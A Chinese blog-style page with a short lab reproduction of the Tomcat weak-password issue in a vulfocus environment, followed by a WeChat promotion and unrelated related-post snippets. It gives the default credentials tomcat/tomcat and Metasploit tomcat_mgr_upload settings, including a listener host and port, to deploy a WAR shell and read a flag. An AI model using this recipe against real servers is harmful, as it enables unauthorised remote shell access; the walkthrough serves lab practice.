tomcat弱口令

Zab Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell。

漏洞编号:

影响版本:
弱口令

复现步骤:
1,打开漏洞环境vulfocus

2,访问URL点击Manager App

3,验证弱口令,输入默认账号密码tomcat tomcat

4,使用msf进入exploit/multi/http/tomcat_mgr_upload模块

5,依次设置

set rhost vulfocus.fofa.so set rport 60231 set httpusername tomcat set httppassword tomcat set lhost VPS IP set lport 6666

6,run

7,查看flag

想了解更多关于tomcat弱口令的内容,请扫微信
或微信搜索jiemingpan

本文链接:http://www.soufuzi.com/jianzhan/2308

(0)
上一篇 2024-07-19 23:06:40
下一篇 2024-07-19 23:06:40

相关推荐

  • 什么是本地服务器地址?

       概念定义:本地服务器地址是指服务器在局域网中的IP地址,通常用于内部网络通信和管理。它并不直接暴露在外部网络中,从而提高了数据的安全性。    地址分类:通常以`192.168.x.x`或`10.x.x.x`为前缀,符合私有IP地址的标准。内部网络中的所有设备通过这些地址进行通信,而外部设备则无法直接访问这些地址。

    2024-12-13 23:53:40
  • 8个好用的SEO关键字研究工具

    1.WordStream的关键字工具(免费) 啊,是的…当然,我永远不会忘记WordStream的 SEO和PPC关键字研究的关键字工具。 使用WordStream关键字工具,您可以定位某些特定位置(相关关键字组),为您提供进一步的建议,还可以根据常见主题对其进行分组seo关键字优化工具,从而轻松实现广告组的启动。   这个关键字研究工具为您提供了30个免费的搜索,

    2023-01-11 00:12:15